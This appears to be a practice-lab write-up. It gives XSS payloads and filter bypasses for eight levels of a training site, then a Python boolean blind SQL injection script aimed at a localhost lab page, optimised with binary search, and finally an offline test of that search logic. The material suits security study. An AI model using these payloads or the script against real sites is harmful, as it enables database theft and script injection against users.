Clearing lab levels 1 to 8
1.
Put the payload after the name parameter in the URL:
?name=<script>alert(1)</script>
2.
Try entering the previous level's payload in the input box; it does not get through. Open the page source to see where the value we entered ends up.
From the screenshot we can see that our input is placed into the value attribute of an input tag, so we first close the value attribute and then enter the payload.
3.
Try the level 1 payload.
It fails.
Try the level 2 idea again and close the tag.
It turns out this page encodes sensitive characters such as < and > into HTML character entities, and other symbols are converted to entities as well; everything passes through htmlspecialchars(). In that case we can use an event handler that needs no quotes.
4.
Handle it the same way as the previous levels.
This page filters the "<" and ">" of <script></script>, so we can try
" onmouseover=alert(1) x="
5.
Same old method.
This page inserts an underscore into the script of <script></script>, turning it into scr_ipt, but it still lets the tag close normally. We try double-writing and upper-case variants and find that none of them work, so we try an a tag instead:
"><a href=javascript:alert(1)>alert</a>
Click "alert" to pass the level.
6.
Same old method.
"><sCRipt>alert(1)</sCRipt>
7.
Same old method.
As we can see, there is a lowercase check here that deletes any on, script and href it detects, so we try double-writing:
"><scrscriptipt>alert(1)</scrscriptipt>
8.
Same old method.
From the screenshot we can see that this time our input is passed into two places, and the methods from the previous levels no longer work. We can try Unicode encoding to see whether it gets past the filter; the encoding can be done on the site 錘子在線工具網 - 首頁.
Click the "友情鏈接" (friendly link) to pass the level.
II. Optimizing the Python automated boolean-based blind injection code (using binary search)
Source code:
import requests

# Target URL
url = "http://127.0.0.1/sqli/Less-8/index.php"

# Database information to infer (for example, the database name)
database_name = ""

# Character set (extend as needed)
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "

# Infer the length of the database name
def get_database_length():
    length = 0
    while True:
        length += 1
        payload = f"1' AND (SELECT length(database()) = {length}) -- "
        response = requests.get(url, params={"id": payload})
        if "You are in..........." in response.text:
            return length
        if length > 50:  # guard against an infinite loop
            break
    return 0

# Infer the database name
def get_database_name(length):
    db_name = ""
    for i in range(1, length + 1):
        for char in charset:
            payload = f"1' AND (SELECT substring(database(), {i}, 1) = '{char}') -- "
            response = requests.get(url, params={"id": payload})
            if "You are in" in response.text:
                db_name += char
                break  # leave the inner loop once the right character is found
    return db_name

# Main
if __name__ == "__main__":
    length = get_database_length()
    if length > 0:
        print(f"Database length: {length}")
        db_name = get_database_name(length)
        print(f"Database name: {db_name}")
    else:
        print("Failed to determine database length.")
Change the character set into sorted form: binary search only works if the character set is in ASCII order, so "-" (45) and "." (46) have to come before the digits and "_" (95) sits between the upper- and lowercase letters:
charset = " -.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"
然后寫出實現二分查找的函數(對于長度和字符的推斷,分別實現兩個二分查找函數)?
def get_database_length():
    low, high = 1, 50
    while low <= high:
        mid = (low + high) // 2
        payload = f"1' AND (SELECT length(database()) <= {mid}) -- "
        response = requests.get(url, params={"id": payload})
        if "You are in" in response.text:
            high = mid - 1
        else:
            low = mid + 1
    return low if low <= 50 else 0

def get_database_name(length):
    db_name = ""
    for i in range(1, length + 1):
        low, high = 0, len(charset) - 1
        while low <= high:
            mid = (low + high) // 2
            current_char = charset[mid]
            # Check whether the current character is greater than or equal to the target character
            payload = f"1' AND (SELECT ASCII(SUBSTRING(database(), {i}, 1)) <= ASCII('{current_char}')) -- "
            response = requests.get(url, params={"id": payload})
            if "You are in" in response.text:
                high = mid - 1
            else:
                low = mid + 1
        if low < len(charset):
            db_name += charset[low]
    return db_name
Next, unify the condition in both functions to "You are in"; to follow the progress of the run, print it after each character is inferred:
print(f"Progress: [{db_name.ljust(length, '.')}] {i}/{length}", end='\r')
修改過后的完整代碼:
import requests

# Target URL
url = "http://127.0.0.1/sqli/Less-8/index.php"

# Database information to infer (for example, the database name)
database_name = ""

# Character set (in ASCII order: "-" and "." before the digits, "_" between upper- and lowercase)
charset = " -.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"

# Infer the length of the database name
def get_database_length():
    low, high = 1, 50
    while low <= high:
        mid = (low + high) // 2
        payload = f"1' AND (SELECT length(database()) <= {mid}) -- "
        response = requests.get(url, params={"id": payload})
        if "You are in" in response.text:
            high = mid - 1
        else:
            low = mid + 1
    return low if low <= 50 else 0

# Infer the database name
def get_database_name(length):
    db_name = ""
    for i in range(1, length + 1):
        low, high = 0, len(charset) - 1
        while low <= high:
            mid = (low + high) // 2
            current_char = charset[mid]
            # Check whether the current character is greater than or equal to the target character
            payload = f"1' AND (SELECT ASCII(SUBSTRING(database(), {i}, 1)) <= ASCII('{current_char}')) -- "
            response = requests.get(url, params={"id": payload})
            if "You are in" in response.text:
                high = mid - 1
            else:
                low = mid + 1
        if low < len(charset):
            db_name += charset[low]
        print(f"Progress: [{db_name.ljust(length, '.')}] {i}/{length}", end='\r')
    print()  # newline
    return db_name

# Main
if __name__ == "__main__":
    try:
        print("正在推斷數據庫長度...")
        length = get_database_length()
        if length > 0:
            print(f"Database length: {length}")
            print("正在推斷數據庫名...")
            db_name = get_database_name(length)
            print(f"Database name: {db_name}")
        else:
            print("Failed to determine database length.")
    except requests.exceptions.RequestException as e:
        print(f"請求異常: {e}")
    except Exception as e:
        print(f"發生錯誤: {e}")
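The same binary search run offline against a simulated true/false oracle, as an added example that is not code from the original post: FakeOracle stands in for the vulnerable page, so the search logic and its request count can be checked without any target and compared with the linear scan of the first version. FakeOracle, infer_length, infer_name and linear_queries are hypothetical names; CHARSET is the ASCII-ordered set from above.

```python
# Added example (not from the original post): the post's binary-search inference
# checked against a simulated boolean oracle. All names here are hypothetical.
CHARSET = " -.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"  # ASCII order

class FakeOracle:
    """Stands in for the web application: it only answers 'condition true/false'."""
    def __init__(self, secret):
        self.secret, self.queries = secret, 0   # queries = requests that would be sent
    def length_le(self, n):                     # length(database()) <= n
        self.queries += 1
        return len(self.secret) <= n
    def char_le(self, pos, ch):                 # ASCII(SUBSTRING(db, pos, 1)) <= ASCII(ch)
        self.queries += 1
        return ord(self.secret[pos - 1]) <= ord(ch)
    def char_eq(self, pos, ch):                 # SUBSTRING(db, pos, 1) = ch
        self.queries += 1
        return self.secret[pos - 1] == ch

def infer_length(oracle, max_len=50):
    low, high = 1, max_len
    while low <= high:
        mid = (low + high) // 2
        if oracle.length_le(mid):
            high = mid - 1
        else:
            low = mid + 1
    return low if low <= max_len else 0

def infer_name(oracle, length, charset=CHARSET):
    """Binary search per position; '?' marks a character outside the charset."""
    name = ""
    for i in range(1, length + 1):
        low, high = 0, len(charset) - 1
        while low <= high:
            mid = (low + high) // 2
            if oracle.char_le(i, charset[mid]):
                high = mid - 1
            else:
                low = mid + 1
        # The post appends charset[low] unchecked; one equality query per
        # position catches characters that are not in the charset at all.
        if low < len(charset) and oracle.char_eq(i, charset[low]):
            name += charset[low]
        else:
            name += "?"
    return name

def linear_queries(secret, charset=CHARSET):  # cost of the post's first, linear version
    return sum(charset.index(c) + 1 for c in secret)
```

The extra equality query marks characters outside the charset with "?", which the post's script would otherwise silently replace with the next larger character. From the defender's side, the same request volume (several near-identical id values per character, differing only in a number or a letter) is the footprint this technique leaves in web server logs.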